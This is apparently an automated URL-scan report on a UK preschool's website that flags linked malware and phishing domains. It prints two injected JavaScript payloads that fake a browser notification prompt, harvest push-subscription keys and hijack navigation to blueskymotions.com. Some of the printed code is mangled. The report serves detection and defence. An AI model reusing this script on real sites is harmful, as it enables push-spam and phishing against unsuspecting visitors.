Overview

URLdigswellpreschool.co.uk/
IP 5.77.32.179 (United Kingdom)
ASN#20860 Iomart Cloud Services Limited
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-12-03 09:38:27 UTC
StatusLoading report..
IDS alerts0
Blocklist alert10
urlquery alerts No alerts detected
Tags None

Domain Summary (14)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
dn9.biz (1) 0 2018-02-18 15:58:44 UTC 2022-12-02 17:25:38 UTC 62.210.13.162 Unknown ranking
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.38.146.2
away.cdnbestplatform.com (1) 0 2022-10-27 14:34:25 UTC 2022-12-02 21:03:08 UTC 91.211.91.104 Unknown ranking
new.weatherplllatform.com (1) 0 2022-10-25 20:18:12 UTC 2022-12-03 01:40:59 UTC 91.211.91.114 Unknown ranking
img-getpocket.cdn.mozilla.net (6) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
0.blueskymotions.com (4) 0 2022-10-25 21:02:02 UTC 2022-12-02 11:13:29 UTC 185.177.94.108 Unknown ranking
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-12-02 17:12:21 UTC 34.117.237.239
ocsp.digicert.com (2) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-12-02 17:27:45 UTC 34.102.187.140
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
digswellpreschool.co.uk (12) 0 2017-02-08 06:14:54 UTC 2022-11-14 00:08:58 UTC 5.77.32.179 Unknown ranking
fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-12-02 23:08:34 UTC 142.250.74.106
blueskymotions.com (2) 0 2022-10-25 21:02:05 UTC 2022-12-02 11:13:28 UTC 185.177.94.108 Unknown ranking
r3.o.lencr.org (8) 344 No data No data 23.36.76.226

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-12-03 2 away.cdnbestplatform.com/go.php?id=9677-22-5680954-11 Malware
2022-12-03 2 new.weatherplllatform.com/stick.js?v=9.00 Malware
2022-12-03 2 blueskymotions.com/w76899721.js Phishing
2022-12-03 2 0.blueskymotions.com/w76899721.js Phishing

mnemonic secure dns
 No alerts detected

Quad9 DNS
Scan Date Severity Indicator Comment
2022-12-03 2 blueskymotions.com Sinkholed
2022-12-03 2 blueskymotions.com Sinkholed
2022-12-03 2 blueskymotions.com Sinkholed
2022-12-03 2 blueskymotions.com Sinkholed
2022-12-03 2 blueskymotions.com Sinkholed
2022-12-03 2 blueskymotions.com Sinkholed


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 1 reports on IP: 5.77.32.179
Date UQ / IDS / BL URL IP
2022-12-03 09:38:27 +0000 0 - 0 - 10 digswellpreschool.co.uk/ 5.77.32.179


Last 5 reports on ASN: Iomart Cloud Services Limited
Date UQ / IDS / BL URL IP
2023-02-08 18:40:34 +0000 0 - 5 - 1 dl.driverpack.io/17-online/DriverPack-17-Onli (...) 109.169.53.106
2023-02-08 17:45:52 +0000 0 - 1 - 0 eanifunding.org.uk/wp-content/uploads/2021/03 (...) 87.117.230.171
2023-02-08 02:34:52 +0000 0 - 0 - 13 radiokastoria.gr/rbbm.mce/signin.php?authoriz (...) 95.154.242.114
2023-02-07 14:46:04 +0000 0 - 0 - 1 antiqueevents.co.uk/copy/login.php 109.169.45.49
2023-02-07 14:18:01 +0000 0 - 0 - 2 adviceoncare.co.uk/Chronopost.fr/21661a6a9a2d (...) 62.233.124.246


Last 1 reports on domain: digswellpreschool.co.uk
Date UQ / IDS / BL URL IP
2022-12-03 09:38:27 +0000 0 - 0 - 10 digswellpreschool.co.uk/ 5.77.32.179


Last 5 reports with similar screenshot
Date UQ / IDS / BL URL IP
2023-02-09 12:27:35 +0000 0 - 0 - 6 insightsitcnet.com/20350-143705/79921?uid=HEJ (...) 54.167.34.126
2023-02-09 11:38:34 +0000 0 - 0 - 1 ammega.microsoft.updatepassword.carddio.com.b (...) 162.241.2.30
2023-02-09 10:26:42 +0000 0 - 0 - 1 bluwireless.microsoft.updatepassword.carddio. (...) 162.241.2.30
2023-02-09 10:25:02 +0000 0 - 0 - 1 digitalmarketinghubli.com/wp-includes/id3/-/8 (...) 43.255.154.28
2023-02-09 10:25:02 +0000 0 - 0 - 1 digitalmarketinghubli.com/wp-includes/id3/-/a (...) 43.255.154.28

JavaScript

Executed Scripts (11)

Executed Evals (2)
#1 JavaScript::Eval (size: 7918) - SHA256: fca928affe945739dee8e4709461838db643ad9d59ff7d0f3b0c7ef9522294f5
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('/ ? auf = mztdcolgg45diojygyxtonjwgmxtemrpge3dombqgyydeojz & s = 1 & sub1 = & sub2 = dfastspeed16 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace(' / ? auf = mztdcolgg45diojygyxtonjwgmxtemrpge3dombqgyydeojz & s = 1 & sub1 = & sub2 = dfastspeed16 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('
            BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG - xOq6GiK31R - NF--qzgT3_C2jurmRX_N6nY4g ');var denied=function(){window.location.href=' / ? auf = mztdcolgg45diojygyxtonjwgmxtemrpge3dombqgyydeojz & s = 1 & sub1 = & sub2 = dfastspeed16 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('
            p256dh '):'
            ';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'
            ';let rawAuthSecret=fff.getKey?fff.getKey('
            auth '):'
            ';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'
            ';return fetch(' / ? send = 60111 c05 - 67 ad - 43 fb - ab40 - d389f156015c & d = meygky3cmm5gi3bpg42tmmy & land = 22 ',{method:'
            POST ',mode:'
            no - cors ',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href=' / ? auf = mztdcolgg45diojygyxtonjwgmxtemrpge3dombqgyydeojz & s = 1 & sub1 = & sub2 = dfastspeed16 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='
            granted '){CCC()}else{denied()}})};if('
            serviceWorker 'in navigator){workerInstaller=navigator.serviceWorker.register(' / w76899721.js ').then(()=>{if(Notification.permission==='
            granted '){window.location.href=' / ? auf = mztdcolgg45diojygyxtonjwgmxtemrpge3dombqgyydeojz & s = 1 & sub1 = & sub2 = dfastspeed16 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '}else if(Notification.permission!=='
            denied '){canStart=true;if(!isChrome){SSS()}}else{denied()}})}
#2 JavaScript::Eval (size: 7852) - SHA256: 64079a45473fa95d9276f0a7f07384b4c037cbf6dcd697ec5a927285692598b3
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('/ ? auf = gazwgy3dge5diojygyxtonjwgmxtemzpge3dombqgyydeojz & s = 1 & sub1 = & sub2 = dfastspeed16 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //0.blueskymotions.com/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed16')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://0.blueskymotions.com/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed16'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=60111c05-67ad-43fb-ab40-d389f156015c&d=meygky3cmm5gi3bpg42tmmy&land=23',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='/?auf=gazwgy3dge5diojygyxtonjwgmxtemzpge3dombqgyydeojz&s=1&sub1=&sub2=dfastspeed16&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/w76899721.js').then(()=>{if(Notification.permission==='granted'){window.location.href='/?auf=gazwgy3dge5diojygyxtonjwgmxtemzpge3dombqgyydeojz&s=1&sub1=&sub2=dfastspeed16&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}

Executed Writes (0)


HTTP Transactions (43)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "6035871C0DE6FF2D120921461207CFA32BC286E1FE78849CE74815FFBB9FF950"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5743
Expires: Sat, 03 Dec 2022 11:14:00 GMT
Date: Sat, 03 Dec 2022 09:38:17 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 981
Cache-Control: max-age=90559
Date: Sat, 03 Dec 2022 09:38:17 GMT
Etag: "6389d3f3-1d7"
Expires: Sun, 04 Dec 2022 10:47:36 GMT
Last-Modified: Fri, 02 Dec 2022 10:31:15 GMT
Server: ECS (ska/F719)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "39F6BB64420BCFC8F0B010168FD35B67732984CD0698409F04D5AE40410422AA"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2161
Expires: Sat, 03 Dec 2022 10:14:18 GMT
Date: Sat, 03 Dec 2022 09:38:17 GMT
Connection: keep-alive

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Content-Length, Alert, Retry-After, Backoff, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Sat, 03 Dec 2022 09:18:15 GMT
cache-control: public,max-age=3600
age: 1202
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    14cd9a0afb6ba9a763651d5112760d1e
Sha1:   75d7b104ab9ab11fbb73c3f348b43b0119b5adfa
Sha256: 4e32a117106be587ffcd63239c16a8117eb7840830d4c9decf6527761967532e
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: lgrc+Y/fTGyhRaenk6cv9PvUY2vxgufscumQKDzY6mTitHx7srqSjws0QfAsQuuqWDELZeS9r2w=
x-amz-request-id: C094NNJQ5JZ0PZ8X
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Sat, 03 Dec 2022 08:46:30 GMT
age: 3107
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
